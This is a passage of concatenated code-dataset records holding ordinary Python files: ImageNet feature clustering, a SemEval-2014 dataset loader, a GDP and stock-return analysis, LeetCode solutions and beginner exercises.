dataset_root\n images = (\n sp.check_output(f\"ls {dataset_root}\", shell=True)\n .decode(\"utf-8\")\n .split(\"\\n\")[:-1]\n )\n ndata = len(images)\n if 
truncate_count > 0:\n ndata = min(ndata, truncate_count)\n\n self.image_size = image_size\n\n self.dataset = [os.path.join(dataset_root, image) for image in images]\n\n random.shuffle(self.dataset)\n self.dataset = self.dataset[:ndata]\n\n # Data transform\n self.transform = transform if transform is not None else lambda x: x\n\n self.nimgs = ndata\n\n def __getitem__(self, index):\n path = self.dataset[index]\n img = Image.open(path).convert(\"RGB\")\n img = self.transform(img)\n\n return {\"rgb\": img}, {\"rgb\": path}\n\n def __len__(self):\n return self.nimgs\n\n\ndef main(args):\n # Enable cuda by default\n args.cuda = True\n\n # Define transforms\n normalize = transforms.Normalize(\n mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]\n )\n imagenet_mean = [0.485, 0.456, 0.406]\n imagenet_std = [0.229, 0.224, 0.225]\n transform = transforms.Compose(\n [transforms.Resize(args.image_size), transforms.ToTensor(), normalize]\n )\n\n # Create datasets\n datasets = {\n split: RGBDataset(\n os.path.join(args.dataset_root, split),\n seed=123,\n transform=transform,\n image_size=args.image_size,\n truncate_count=args.truncate_count,\n )\n for split in [\"train\", \"val\", \"test\"]\n }\n\n # Create data loaders\n data_loaders = {\n split: DataLoader(\n dataset, batch_size=args.batch_size, shuffle=True, num_workers=16\n )\n for split, dataset in datasets.items()\n }\n\n device = torch.device(\"cuda:0\" if args.cuda else \"cpu\")\n\n # Create model\n net = FeatureNetwork()\n net.to(device)\n net.eval()\n\n # Generate image features for training images\n train_image_features = []\n train_image_paths = []\n\n for i, data in enumerate(data_loaders[\"train\"], 0):\n\n # sample data\n inputs, input_paths = data\n inputs = {key: val.to(device) for key, val in inputs.items()}\n\n # Extract features\n with torch.no_grad():\n feats = net(inputs[\"rgb\"]) # (bs, 512)\n feats = feats.detach().cpu().numpy()\n train_image_features.append(feats)\n train_image_paths += input_paths[\"rgb\"]\n\n train_image_features = np.concatenate(train_image_features, axis=0)\n\n # Generate image features for testing images\n test_image_features = []\n test_image_paths = []\n\n for i, data in enumerate(data_loaders[\"test\"], 0):\n\n # sample data\n inputs, input_paths = data\n inputs = {key: val.to(device) for key, val in inputs.items()}\n\n # Extract features\n with torch.no_grad():\n feats = net(inputs[\"rgb\"]) # (bs, 512)\n feats = feats.detach().cpu().numpy()\n test_image_features.append(feats)\n test_image_paths += input_paths[\"rgb\"]\n\n test_image_features = np.concatenate(test_image_features, axis=0) # (N, 512)\n\n # ================= Perform clustering ==================\n kmeans = MiniBatchKMeans(\n init=\"k-means++\",\n n_clusters=args.num_clusters,\n batch_size=args.batch_size,\n n_init=10,\n max_no_improvement=20,\n verbose=0,\n )\n save_h5_path = os.path.join(\n args.save_dir, f\"clusters_{args.num_clusters:05d}_data.h5\"\n )\n if os.path.isfile(save_h5_path):\n print(\"========> Loading existing clusters!\")\n h5file = h5py.File(os.path.join(save_h5_path), \"r\")\n train_cluster_centroids = np.array(h5file[\"cluster_centroids\"])\n kmeans.cluster_centers_ = train_cluster_centroids\n train_cluster_assignments = kmeans.predict(train_image_features) # (N, )\n h5file.close()\n else:\n kmeans.fit(train_image_features)\n train_cluster_assignments = kmeans.predict(train_image_features) # (N, )\n train_cluster_centroids = np.copy(\n kmeans.cluster_centers_\n ) # (num_clusters, 512)\n\n # Create a dictionary of 
cluster -> images for visualization\n cluster2image = {}\n if args.visualize_clusters:\n log_dir = os.path.join(\n args.save_dir, f\"train_clusters_#clusters{args.num_clusters:05d}\"\n )\n tbwriter = SummaryWriter(log_dir=log_dir)\n\n for i in range(args.num_clusters):\n valid_idxes = np.where(train_cluster_assignments == i)[0]\n valid_image_paths = [train_image_paths[j] for j in valid_idxes]\n # Shuffle and pick only upto 100 images per cluster\n random.shuffle(valid_image_paths)\n # Read the valid images\n valid_images = []\n for path in valid_image_paths[:100]:\n img = cv2.resize(\n np.flip(cv2.imread(path), axis=2), (args.image_size, args.image_size),\n )\n valid_images.append(img)\n valid_images = (\n np.stack(valid_images, axis=0).astype(np.float32) / 255.0\n ) # (K, H, W, C)\n valid_images = torch.Tensor(valid_images).permute(0, 3, 1, 2).contiguous()\n cluster2image[i] = valid_images\n if args.visualize_clusters:\n # Write the train image clusters to tensorboard\n tbwriter.add_images(f\"Cluster #{i:05d}\", valid_images, 0)\n\n h5file = h5py.File(\n os.path.join(args.save_dir, f\"clusters_{args.num_clusters:05d}_data.h5\"), \"a\"\n )\n\n if \"cluster_centroids\" not in h5file.keys():\n h5file.create_dataset(\"cluster_centroids\", data=train_cluster_centroids)\n for i in range(args.num_clusters):\n if f\"cluster_{i}/images\" not in h5file.keys():\n h5file.create_dataset(f\"cluster_{i}/images\", data=cluster2image[i])\n\n h5file.close()\n\n if args.visualize_clusters:\n # Dot product of test_image_features with train_cluster_centroids\n test_dot_centroids = np.matmul(\n test_image_features, train_cluster_centroids.T\n ) # (N, num_clusters)\n if args.normalize_embedding:\n test_dot_centroids = (test_dot_centroids + 1.0) / 2.0\n else:\n test_dot_centroids = F.softmax(\n torch.Tensor(test_dot_centroids), dim=1\n ).numpy()\n\n # Find the top-K matching centroids\n topk_matches = np.argpartition(test_dot_centroids, -5, axis=1)[:, -5:] # (N, 5)\n\n # Write the test nearest neighbors to tensorboard\n tbwriter = SummaryWriter(\n log_dir=os.path.join(\n args.save_dir, f\"test_neighbors_#clusters{args.num_clusters:05d}\"\n )\n )\n for i in range(100):\n test_image_path = test_image_paths[i]\n test_image = cv2.resize(\n cv2.imread(test_image_path), (args.image_size, args.image_size)\n )\n test_image = np.flip(test_image, axis=2).astype(np.float32) / 255.0\n test_image = torch.Tensor(test_image).permute(2, 0, 1).contiguous()\n topk_clusters = topk_matches[i]\n # Pick some 4 images representative of a cluster\n topk_cluster_images = []\n for k in topk_clusters:\n imgs = cluster2image[k][:4] # (4, C, H, W)\n if imgs.shape[0] == 0:\n continue\n elif imgs.shape[0] != 4:\n imgs_pad = torch.zeros(4 - imgs.shape[0], *imgs.shape[1:])\n imgs = torch.cat([imgs, imgs_pad], dim=0)\n # Downsample by a factor of 2\n imgs = F.interpolate(\n imgs, scale_factor=0.5, mode=\"bilinear\"\n ) # (4, C, H/2, W/2)\n # Reshape to form a grid\n imgs = imgs.permute(1, 0, 2, 3) # (C, 4, H/2, W/2)\n C, _, Hby2, Wby2 = imgs.shape\n imgs = (\n imgs.view(C, 2, 2, Hby2, Wby2)\n .permute(0, 1, 3, 2, 4)\n .contiguous()\n .view(C, Hby2 * 2, Wby2 * 2)\n )\n # Draw a red border\n imgs[0, :4, :] = 1.0\n imgs[1, :4, :] = 0.0\n imgs[2, :4, :] = 0.0\n imgs[0, -4:, :] = 1.0\n imgs[1, -4:, :] = 0.0\n imgs[2, -4:, :] = 0.0\n imgs[0, :, :4] = 1.0\n imgs[1, :, :4] = 0.0\n imgs[2, :, :4] = 0.0\n imgs[0, :, -4:] = 1.0\n imgs[1, :, -4:] = 0.0\n imgs[2, :, -4:] = 0.0\n topk_cluster_images.append(imgs)\n\n vis_img = torch.cat([test_image, 
*topk_cluster_images], dim=2)\n image_name = f\"Test image #{i:04d}\"\n for k in topk_clusters:\n score = test_dot_centroids[i, k].item()\n image_name += f\"_{score:.3f}\"\n tbwriter.add_image(image_name, vis_img, 0)\n\n\ndef str2bool(v):\n return True if v.lower() in [\"yes\", \"y\", \"true\", \"t\"] else False\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--image-size\", type=int, default=256)\n parser.add_argument(\"--dataset-root\", type=str, default=\"dataset\")\n parser.add_argument(\"--truncate-count\", type=int, default=-1)\n parser.add_argument(\"--batch-size\", type=int, default=128)\n parser.add_argument(\"--num-clusters\", type=int, default=100)\n parser.add_argument(\"--save-dir\", type=str, default=\"visualization_dir\")\n parser.add_argument(\"--visualize-clusters\", type=str2bool, default=True)\n parser.add_argument(\"--normalize-embedding\", type=str2bool, default=True)\n\n args = parser.parse_args()\n\n main(args)\n","repo_name":"facebookresearch/exploring_exploration","sub_path":"reconstruction_data_generation/generate_imagenet_clusters.py","file_name":"generate_imagenet_clusters.py","file_ext":"py","file_size_in_byte":10378,"program_lang":"python","lang":"en","doc_type":"code","stars":60,"dataset":"github-code","pt":"21"} +{"seq_id":"31908046116","text":"\nimport datasets\n\n_CITATION = \"\"\"\\\n@article{2014SemEval,\n title={SemEval-2014 Task 4: Aspect Based Sentiment Analysis},\n author={ Pontiki, M. and D Galanis and Pavlopoulos, J. and Papageorgiou, H. and Manandhar, S. },\n journal={Proceedings of International Workshop on Semantic Evaluation at},\n year={2014},\n}\n\"\"\"\n\n_LICENSE = \"\"\"\\\n Please click on the homepage URL for license details.\n\"\"\"\n\n_DESCRIPTION = \"\"\"\\\nA collection of SemEval2014 specifically designed to aid research in Aspect Based Sentiment Analysis.\n\"\"\"\n\n_CONFIG = [\n \n # restaurants domain\n \"restaurants\",\n # laptops domain\n \"laptops\",\n]\n\n_VERSION = \"0.0.1\"\n\n_HOMEPAGE_URL = \"https://alt.qcri.org/semeval2014/task4/index.php?id=data-and-tools\"\n_DOWNLOAD_URL = \"https://raw.githubusercontent.com/YaxinCui/ABSADataset/main/SemEval2014Task4/{split}/{domain}_{split}.xml\"\n\n\nclass SemEval2014Config(datasets.BuilderConfig):\n \"\"\"BuilderConfig for SemEval2014Config.\"\"\"\n\n def __init__(self, _CONFIG, **kwargs):\n super(SemEval2014Config, self).__init__(version=datasets.Version(_VERSION, \"\"), **kwargs),\n self.configs = _CONFIG\n\n\nclass SemEval2014(datasets.GeneratorBasedBuilder):\n \"\"\"The lingual Amazon Reviews Corpus\"\"\"\n\n BUILDER_CONFIGS = [\n SemEval2014Config(\n name=\"All\",\n _CONFIG=_CONFIG,\n description=\"A collection of SemEval2014 specifically designed to aid research in lingual Aspect Based Sentiment Analysis.\",\n )\n ] + [\n SemEval2014Config(\n name=config,\n _CONFIG=[config],\n description=f\"{config} of SemEval2014 specifically designed to aid research in Aspect Based Sentiment Analysis\",\n )\n for config in _CONFIG\n ]\n \n BUILDER_CONFIG_CLASS = SemEval2014Config\n DEFAULT_CONFIG_NAME = \"All\"\n\n def _info(self):\n return datasets.DatasetInfo(\n description=_DESCRIPTION,\n features=datasets.Features(\n {'text': datasets.Value(dtype='string'),\n 'aspectTerms': [\n {'from': datasets.Value(dtype='string'),\n 'polarity': datasets.Value(dtype='string'),\n 'term': datasets.Value(dtype='string'),\n 'to': datasets.Value(dtype='string')}\n ],\n 'aspectCategories': [\n {'category': datasets.Value(dtype='string'),\n 'polarity': 
datasets.Value(dtype='string')}\n                ],\n                'domain': datasets.Value(dtype='string'),\n                'sentenceId': datasets.Value(dtype='string')\n                }\n            ),\n            supervised_keys=None,\n            license=_LICENSE,\n            homepage=_HOMEPAGE_URL,\n            citation=_CITATION,\n        )\n\n    def _split_generators(self, dl_manager): \n\n        train_urls = [_DOWNLOAD_URL.format(split=\"train\", domain=config) for config in self.config.configs]\n        dev_urls = [_DOWNLOAD_URL.format(split=\"trial\", domain=config) for config in self.config.configs]\n        test_urls = [_DOWNLOAD_URL.format(split=\"test\", domain=config) for config in self.config.configs]\n\n        train_paths = dl_manager.download_and_extract(train_urls)\n        dev_paths = dl_manager.download_and_extract(dev_urls)\n        test_paths = dl_manager.download_and_extract(test_urls)\n\n        return [\n            datasets.SplitGenerator(name=datasets.Split.TRAIN, gen_kwargs={\"file_paths\": train_paths, \"domain_list\": self.config.configs}),\n            datasets.SplitGenerator(name=datasets.Split.VALIDATION, gen_kwargs={\"file_paths\": dev_paths, \"domain_list\": self.config.configs}),\n            datasets.SplitGenerator(name=datasets.Split.TEST, gen_kwargs={\"file_paths\": test_paths, \"domain_list\": self.config.configs}),\n        ]\n\n    def _generate_examples(self, file_paths, domain_list):\n        row_count = 0\n        assert len(file_paths)==len(domain_list)\n\n        for i in range(len(file_paths)):\n            file_path, domain = file_paths[i], domain_list[i]\n            semEvalDataset = SemEvalXMLDataset(file_path, domain)\n\n            for example in semEvalDataset.SentenceWithOpinions:\n                yield row_count, example\n                row_count += 1\n\nfrom xml.dom.minidom import parse\n\nclass SemEvalXMLDataset():\n    def __init__(self, file_name, domain):\n        # Build SentenceWithOpinions, a list containing (reviewId, sentenceId, text, Opinions)\n\n        self.SentenceWithOpinions = []\n        self.xml_path = file_name\n\n        self.sentenceXmlList = parse(self.xml_path).getElementsByTagName('sentence')\n\n        for sentenceXml in self.sentenceXmlList:\n            \n            sentenceId = sentenceXml.getAttribute(\"id\")\n            if len(sentenceXml.getElementsByTagName(\"text\")[0].childNodes) < 1:\n                # skip no reviews part\n                continue\n            text = sentenceXml.getElementsByTagName(\"text\")[0].childNodes[0].nodeValue\n\n            aspectTermsXLMList = sentenceXml.getElementsByTagName(\"aspectTerm\")\n            aspectTerms = []\n            for opinionXml in aspectTermsXLMList:\n                # some sentences may have no opinions\n                term = opinionXml.getAttribute(\"term\")\n                polarity = opinionXml.getAttribute(\"polarity\")\n                from_ = opinionXml.getAttribute(\"from\")\n                to = opinionXml.getAttribute(\"to\")\n                aspectTermDict = {\n                    \"term\": term,\n                    \"polarity\": polarity,\n                    \"from\": from_,\n                    \"to\": to\n                }\n                aspectTerms.append(aspectTermDict)\n\n            # sort in ascending order\n            aspectTerms.sort(key=lambda x: x[\"from\"])\n\n            aspectCategoriesXmlList = sentenceXml.getElementsByTagName(\"aspectCategory\")\n            aspectCategories = []\n            for aspectCategoryXml in aspectCategoriesXmlList:\n                category = aspectCategoryXml.getAttribute(\"category\")\n                polarity = aspectCategoryXml.getAttribute(\"polarity\")\n                aspectCategoryDict = {\n                    \"category\": category,\n                    \"polarity\": polarity\n                }\n                aspectCategories.append(aspectCategoryDict)\n\n            self.SentenceWithOpinions.append({\n                \"text\": text, \n                \"aspectTerms\": aspectTerms,\n                \"aspectCategories\": aspectCategories,\n                \"domain\": domain, \n                \"sentenceId\": sentenceId\n                }\n            )","repo_name":"YaxinCui/ABSADataset","sub_path":"cache/SemEval2014.py","file_name":"SemEval2014.py","file_ext":"py","file_size_in_byte":6561,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"}
+{"seq_id":"22812900562","text":"global strArray\r\nstrArray = []\r\nglobal resultList\r\nresultList = []\r\nimport re\r\ndef main():\r\n    str_slice()\r\n    str_delete_duplicate()\r\n    str_output()\r\n    print(strArray)\r\n\r\ndef str_delete_duplicate():\r\n    resultList.sort()\r\n    [strArray.append(i) for i in resultList if not i in strArray]\r\n    \r\n\r\ndef str_slice():\r\n    with open(\"C:/Users/root/Desktop/ka.txt\",encoding = \"utf-8\") as f:\r\n        for line in f:\r\n            # print(line)\r\n            result = re.findall(r'[\\s\\S]{1,}[\\d]{2}',line)\r\n            for i in result:\r\n                resultList.append(i)\r\n    return\r\n\r\ndef str_output():\r\n    with open(\"./output.txt\",\"w+\") as f:\r\n        for each in strArray:\r\n            f.write(str(each))\r\n            f.write(\"\\n\")\r\n        f.close()\r\n    return\r\n\r\nmain()","repo_name":"CelestialCosmic/myTools","sub_path":"kairo.py","file_name":"kairo.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14735494824","text":"# enumerate(): pull out the index together with the element itself\n\nL = ['Admin','Lisa','Bart','Paull']\na = tuple(enumerate(L))\n\nfor i in enumerate(L):\n    index = i[0]\n    name = i[1]\n    print(index, name)\n\nL = (1, 'Lisa')\nfor index ,name in enumerate(L):\n    print(index,name)\n\na = list(zip([10,20,30],['A','B','C']))\n\nprint(a)\n\n# map(function,iterable,....)\n# The first argument is a function; it is called with every element of the sequence, and a new list of the return values is built\n# Use map() to turn a list of badly formatted English names into a list of properly formatted ones:\ndef format_name(s):\n    s = s[0].upper() + s[1:].lower()\n    return s\nprint(list(map(format_name, ['adam', 'LISA', 'barT'])))\n\n\n# reduce() accumulates across the elements of the sequence\n# Use reduce() to compute a product:\nfrom functools import reduce\ndef prod(x,y):\n    return x*y\n\nprint(reduce(prod,[2,4,5,7,12]))\n\n# Filter out the elements that fail the predicate, returning a new iterator over those that pass\n# Use filter() to pick out the numbers in 1~100 whose square root is an integer\ndef is_sqr(x):\n    num = int(x**0.5)\n\n    return x and num*num == x\n\nprint(list(filter(is_sqr,list(range(1,101)))))\n","repo_name":"xmc2016/python_study","sub_path":"Built_infunction/Functionl.py","file_name":"Functionl.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37227811633","text":"import sys\r\nimport statistics\r\nimport numpy as np\r\nfrom PyQt5 import uic, QtWidgets\r\n\r\nimport Outliers, Puntuacion_z\r\n\r\nqtCreatorFile = \"PROYECTO-Completo.ui\"  # File name goes here.\r\nUi_MainWindow, QtBaseClass = uic.loadUiType(qtCreatorFile)\r\n\r\nclass MyApp(QtWidgets.QMainWindow, Ui_MainWindow):\r\n    def __init__(self):\r\n        QtWidgets.QMainWindow.__init__(self)\r\n        Ui_MainWindow.__init__(self)\r\n        self.setupUi(self)\r\n\r\n        # Signals and initial setup area\r\n        self.btnAceptar.clicked.connect(self.aceptar)\r\n\r\n    # Slots area\r\n    def aceptar(self):\r\n        datos = np.loadtxt('datos.txt', delimiter=',', skiprows=1, usecols=1)\r\n        numeros = datos.tolist()\r\n\r\n        if self.rB_media.isChecked():\r\n            media = statistics.mean(numeros)\r\n            print(\"Media: \" + str(media))\r\n        elif self.rB_moda.isChecked():\r\n            moda = statistics.mode(numeros)\r\n            print(\"Moda: \" + str(moda))\r\n        elif self.rB_mediana.isChecked():\r\n            mediana = statistics.median(numeros)\r\n            print(\"Mediana: \" + str(mediana))\r\n        elif self.rB_vMayor.isChecked():\r\n            mayor = max(numeros)\r\n            print(\"Valor mayor: \" + str(mayor))\r\n        elif self.rB_vMenor.isChecked():\r\n            menor = min(numeros)\r\n            print(\"Valor menor: \" + str(menor))\r\n\r\n\r\n        if self.rB_normalizacion.isChecked():\r\n            normalizacion = (np.array(numeros) - np.min(numeros)) / 
(np.max(numeros) - np.min(numeros))\r\n print(\"Normalización: \" + str(normalizacion))\r\n elif self.rB_estandarizacion.isChecked():\r\n estandarizacion = (np.array(numeros) - np.mean(numeros)) / np.std(numeros)\r\n print(\"Estandarización:\" + str(estandarizacion))\r\n elif self.rB_complemento.isChecked():\r\n complemento = []\r\n for numero in numeros:\r\n complemento.append(1 - numero)\r\n print(\"Complemento: \"+ str(complemento))\r\n\r\n if self.rB_IQR.isChecked():\r\n Q = Outliers.outliers(numeros)\r\n print(\"IQR: \"+str(Q))\r\n elif self.rB_PuntZ.isChecked():\r\n puntuacion_z = Puntuacion_z.calcular_puntuaciones_z(numeros)\r\n print(\"Puntuación Z: \"+str(puntuacion_z))\r\n else:\r\n self.mensaje(\"Falta por seleccionar alguna opción de alguna Tabla.\")\r\n\r\n def mensaje(self, texto):\r\n msj = QtWidgets.QMessageBox()\r\n msj.setText(texto)\r\n msj.exec_()\r\n\r\nif __name__ == \"__main__\":\r\n app = QtWidgets.QApplication(sys.argv)\r\n window = MyApp()\r\n window.show()\r\n sys.exit(app.exec_())\r\n\r\n","repo_name":"RocioRRdz/SE_I_U3_EQ_4","sub_path":"PROYECTO Unidad/Parte_2.py","file_name":"Parte_2.py","file_ext":"py","file_size_in_byte":2653,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18999150195","text":"import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom IPython.display import display\r\nimport seaborn\r\n\r\n#load US stocks and GDP datasets\r\nstocks = pd.read_csv('stocks.csv')\r\ngdp = pd.read_csv('gdp.csv')\r\n\r\n#set year as the index for stocks data frame\r\nstocks = stocks.set_index(['Year'])\r\n\r\n#rename the columns and set year as the index for gdp data frame\r\ngdp = gdp.rename(columns={'Unnamed: 0':'Year', 'GDP in billions of chained 2009 dollars':'Real GDP in billions'})\r\ngdp = gdp.set_index(['Year'])\r\ngdp.head()\r\n\r\n#drop the nomial gdp column\r\ngdp = gdp.drop('GDP in billions of current dollars', axis = 1)\r\ngdp.head()\r\n\r\n#merge gdp and stocks to one data frame and drop rows that contains Na\r\nnewData = pd.concat([gdp, stocks], axis = 1)\r\nnewData = newData.dropna()\r\n\r\n#create a new column called GDP growth rate\r\nnewData.loc[1929, 'Real GDP in billions']\r\nnewData['GDP copy'] = newData['Real GDP in billions']\r\n\r\n#create a function to calculate GDP growth rate\r\ndef growth ():\r\n n = 1930\r\n for n in range(1930, 2015):\r\n newData['GDP copy'].ix[n] = newData['Real GDP in billions'].ix[n-1]\r\n n += 1\r\n newData['GDP Growth Rate'] = (newData['Real GDP in billions']-newData['GDP copy'])/ newData['GDP copy']\r\n\r\n#call the function, perform the calculation\r\ngrowth()\r\n\r\n#drop all unneeded columns\r\nnewData = newData.drop(['Stocks','T.Bills','T.Bonds','GDP copy', 'Stocks - Bills', 'Stocks - Bonds'], axis=1)\r\nnewData.head()\r\n\r\n#format rate of returns and GDP growth rate to percent\r\nnewData['S&P 500'] = pd.Series(['{0:.2f}%'.format(val*100) for val in newData['S&P 500']],\r\n index = newData.index)\r\nnewData['3-month T.Bill'] = pd.Series(['{0:.2f}%'.format(val*100) for val in newData['3-month T.Bill']],\r\n index = newData.index)\r\nnewData['10-year T. Bond'] = pd.Series(['{0:.2f}%'.format(val*100) for val in newData['10-year T. 
Bond']],\r\n                             index = newData.index)\r\nnewData['GDP Growth Rate']= pd.Series(['{0:.2f}%'.format(val*100) for val in newData['GDP Growth Rate']],\r\n                             index = newData.index)\r\n\r\n#find the top 5 years with highest GDP growth rate\r\nnewData['GDP Growth Rate'].sort_values(ascending = False).head()\r\n\r\n#find the top 5 years with highest rate of return for S&P 500 stocks\r\nnewData['S&P 500'].sort_values(ascending = False).head()\r\n\r\n#find the top 5 years with highest rate of return for T.Bill\r\nnewData['3-month T.Bill'].sort_values(ascending = False).head()\r\n\r\n#find the top 5 years with highest rate of return for T. bond\r\nnewData['10-year T. Bond'].sort_values(ascending = False).head()\r\n\r\n#create function to plot real GDP for selected year range\r\n\r\ndef gdp_range(y1, y2):\r\n    data = newData.loc[y1:y2,'Real GDP in billions']\r\n    plot = data.plot(kind = 'line', title =str(y1)+' - '+ str(y2)+ ' US GDP', figsize = (10, 5), fontsize=12)\r\n    plt.xlabel('Year')\r\n    plt.ylabel('$ in billions')\r\n    \r\n    #create function to format y label and make it display with commas\r\n    def update_labels(ax):\r\n        ylabels = [format(label, ',.0f') for label in ax.get_yticks()]\r\n        ax.set_yticklabels(ylabels)\r\n    update_labels(plot)\r\n    \r\n    plt.show()\r\n\r\n#plot real GDP from 2000 to 2015\r\ngdp_range(2000, 2015)\r\n\r\n#create function to plot all 3 types of stocks rate of return for selected year range \r\n\r\ndef plotRR(y1, y2):\r\n    newData['S&P 500'] = newData['S&P 500'].replace('%', '', regex=True).astype('float')\r\n    newData['3-month T.Bill'] = newData['3-month T.Bill'].replace('%', '', regex=True).astype('float')\r\n    newData['10-year T. Bond'] = newData['10-year T. Bond'].replace('%', '', regex=True).astype('float')\r\n    data = newData.loc[y1:y2, 'S&P 500':'10-year T. Bond']\r\n    plot = data.plot(kind = 'line', title =str(y1)+' - '+ str(y2)+ ' US Stock Rate of Returns',figsize =(15, 6),fontsize=12)\r\n    plt.xlabel('Year')\r\n    plt.ylabel('Rate of Return %')  \r\n    plt.show()\r\n\r\nplotRR(2000,2015)\r\n\r\n#create function to plot GDP growth rate and rate of return of T.Bills in one plot\r\n\r\ndef gdp_Tbill(y1, y2):\r\n    data = newData.loc[y1:y2]\r\n    data1 = data.loc[:,'3-month T.Bill']\r\n    plot = data1.plot(kind='line', label='T.Bill Rate of Return')\r\n    data.loc[:,'GDP Growth Rate'].plot(kind = 'line' ,ax = plot, figsize=(10,5), fontsize=12)\r\n    plt.legend(loc='best')\r\n    plt.title(str(y1)+' - '+str(y2)+' US GDP Growth Rate vs. T.Bill Rate of Return')\r\n    plt.xlabel('Year')\r\n    plt.ylabel('%')\r\n    plt.show()\r\n\r\ngdp_Tbill(2000,2015)\r\n\r\n#create function to plot GDP growth rate and rate of return of T.Bonds in one plot\r\n\r\ndef gdp_Tbond(y1, y2):\r\n    data = newData.loc[y1:y2]\r\n    data1 = data.loc[:,'10-year T. Bond']\r\n    plot = data1.plot(kind='line', label='T. Bond Rate of Return')\r\n    data.loc[:,'GDP Growth Rate'].plot(kind = 'line' ,ax = plot, figsize=(10,5), fontsize=12)\r\n    plt.legend(loc='best')\r\n    plt.title(str(y1)+' - '+str(y2)+' US GDP Growth Rate vs. T.Bond Rate of Return')\r\n    plt.xlabel('Year')\r\n    plt.ylabel('%')\r\n    plt.show()\r\n\r\ngdp_Tbond(2000,2015)","repo_name":"violayang/datamining","sub_path":"gdp_analytics.py","file_name":"gdp_analytics.py","file_ext":"py","file_size_in_byte":5107,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"18406134409","text":"import itertools\nimport math\nimport operator\nimport random\nfrom bisect import *\nfrom collections import deque, defaultdict, Counter\nfrom heapq import *\nimport unittest\nfrom typing import List\ndef get_sol(): return Solution()\n\nclass Solution:\n    # greedy\n    # time O(nlogn) space O(1)\n    def findLongestChain(self, pairs: List[List[int]]) -> int:\n        pairs.sort(key=operator.itemgetter(1)) # sort based on index 1\n        b=float('-inf')\n        cnt=0\n        for pair in pairs:\n            c = pair[0]\n            if c>b:\n                cnt+=1\n                b=pair[1]\n        return cnt\nclass Solution2:\n    # greedy\n    # time O(nlogn) space O(n)\n    def findLongestChain(self, pairs: List[List[int]]) -> int:\n        pairs.sort(key=operator.itemgetter(1)) # sort based on index 1\n        res=[[-2001,-2000]] # dummy\n        for pair in pairs:\n            b = res[-1][1]\n            c = pair[0]\n            if c>b: res.append(pair)\n        return len(res)-1\nclass Solution3:\n    # longest increasing subsequence\n    # time O(n^2) space O(n)\n    def findLongestChain(self, pairs: List[List[int]]) -> int:\n        n=len(pairs)\n        pairs.sort(key=operator.itemgetter(1))\n        lis = [1]*n\n        for i in range(n):\n            for j in range(i):\n                b=pairs[j][1]\n                c=pairs[i][0]\n                if c>b:\n                    lis[i]=max(lis[i],lis[j]+1)\n        return max(lis)\n\nclass mytestcase(unittest.TestCase):\n    def test1_1(self):\n        pairs = [[1,2],[2,3],[3,4]]\n        Output= 2\n        self.assertEqual(Output,get_sol().findLongestChain(pairs))\n    def test1_2(self):\n        pairs = [[1,2],[7,8],[4,5]]\n        Output= 3\n        self.assertEqual(Output,get_sol().findLongestChain(pairs))\n","repo_name":"afzalsiddique/problem-solving","sub_path":"Problem_Solving_Python/leetcode/lc646.py","file_name":"lc646.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"}
+{"seq_id":"6662587016","text":"\r\n# Creating a simple class and object function\r\nclass myFunction():\r\n\r\n    def __init__(self, fname, lastname):\r\n        self.fname = fname\r\n        self.lastname = lastname\r\n\r\n    def hello(self):\r\n        print(\"Hi {} is this your last name {} ?\". 
format(self.fname, self.lastname))\r\n\r\n\r\ns1 = myFunction(\"neethu\", \"Vignesh\")\r\ns1.hello()\r\n\r\n#Unpack and perform highest value tuple from list of tuples \r\nmy_list = [(\"john\", 1000), (\"lisa\", 2300),(\"Ava\", 2400)]\r\n\r\ndef largerthan(my_list):\r\n\r\n max_time = 0\r\n best_name = ''\r\n\r\n for name, time in my_list:\r\n if time > max_time:\r\n max_time = time\r\n best_name = name\r\n else :\r\n best_name = \"Phoneix\"\r\n max_time = 1200\r\n return best_name, max_time\r\n\r\nname, time = largerthan(my_list)\r\nprint(name, time)\r\n\r\n#Dynamically Checking the arugments before passing into the function\r\ndef add_numbers(a,b):\r\n a = int(a)\r\n b =int(b)\r\n return str(a + b)\r\n\r\nres = add_numbers('66',4.7)\r\nprint(res)\r\n\r\n#Return True if any number is even inside a list\r\n\r\nmy_lst =[1,2,4,8,9,12]\r\n### List Comprehension\r\nempty_lst = [j for j in my_lst if j % 2 ==0 ]\r\nprint(empty_lst)\r\n\r\ndef checkeven_number(my_lst):\r\n empty_lst = []\r\n for i in my_lst:\r\n print(i)\r\n if i % 2 == 0 :\r\n empty_lst.append(i)\r\n else :\r\n pass #return \"No Even Number\"\r\n return empty_lst\r\n\r\nresult = checkeven_number(my_lst)\r\nprint(result)\r\n\r\n#parameter and Arguments\r\n\r\n#parameters while defining the function\r\ndef hello_name(name, age):\r\n return 'Welcome ' +name+ ' your age is ' +str(age)+ '. Have a nice time.' #here name and age is variable\r\n\r\n#here it is arguments or invoking or calling the function\r\nprint(hello_name(\"neethu\", 27))\r\n\r\n\r\n#Default parameter and keyword arguments\r\ndef hello_name(name=\"joey\", age=78):\r\n return 'Welcome ' +name+ ' your age is ' +str(age)+ '. Have a nice time.' \r\n\r\n\r\nprint(hello_name(\"chandler\", 77))\r\nprint(hello_name(\"monica\", 79))\r\nprint(hello_name(\"phoebe\")) #default parameter\r\nprint(hello_name(age= 27, name=\"rachel\")) #keyword arguments\r\nprint(hello_name())\r\n\r\n\r\n#Problem Practice:\r\n#age = input(\"What is your age?: \")\r\n\r\n#1. Wrap the above code in a function called checkDriverAge(). Whenever you call this function, you will get prompted for age. \r\n# Notice the benefit in having checkDriverAge() instead of copying and pasting the function everytime?\r\n\r\n#2 Instead of using the input(). Now, make the checkDriverAge() function accept an argument of age, so that if you enter:\r\n#checkDriverAge(92);\r\n#it returns \"Powering On. Enjoy the ride!\"\r\n#also make it so that the default age is set to 0 if 